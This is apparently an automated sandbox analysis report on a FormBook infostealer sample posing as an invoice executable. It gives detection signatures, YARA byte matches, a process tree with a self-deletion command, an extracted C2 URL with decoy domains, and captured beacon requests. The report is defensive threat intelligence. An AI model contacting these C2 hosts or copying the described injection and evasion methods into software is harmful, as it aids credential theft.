Loading ...

Play interactive tourEdit tour

Windows Analysis Report EXPORT INVOICE 2021.exe

Overview

General Information

Sample Name:EXPORT INVOICE 2021.exe
Analysis ID:502233
MD5:54bb8fbbfe0a665ca59579a0240ce2f0
SHA1:0b97e4463c76df4541179880902bb6966ef3f894
SHA256:3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • EXPORT INVOICE 2021.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
    • EXPORT INVOICE 2021.exe (PID: 5548 cmdline: {path} MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5860 cmdline: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.2.EXPORT INVOICE 2021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.EXPORT INVOICE 2021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1688, ProcessCommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', ProcessId: 5860

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%Perma Link
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: EXPORT INVOICE 2021.exeJoe Sandbox ML: detected
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.161.86.13 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.165 80
          Source: C:\Windows\explorer.exeDomain query: www.ratqueen.art
          Source: C:\Windows\explorer.exeDomain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exeDomain query: www.yuezhong66.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.vulcanopresale.icu/mqi9/
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: unknownDNS traffic detected: queries for: www.ratqueen.art
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B8C6
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C12C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CBC5
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041BBDF
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C383
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C3A
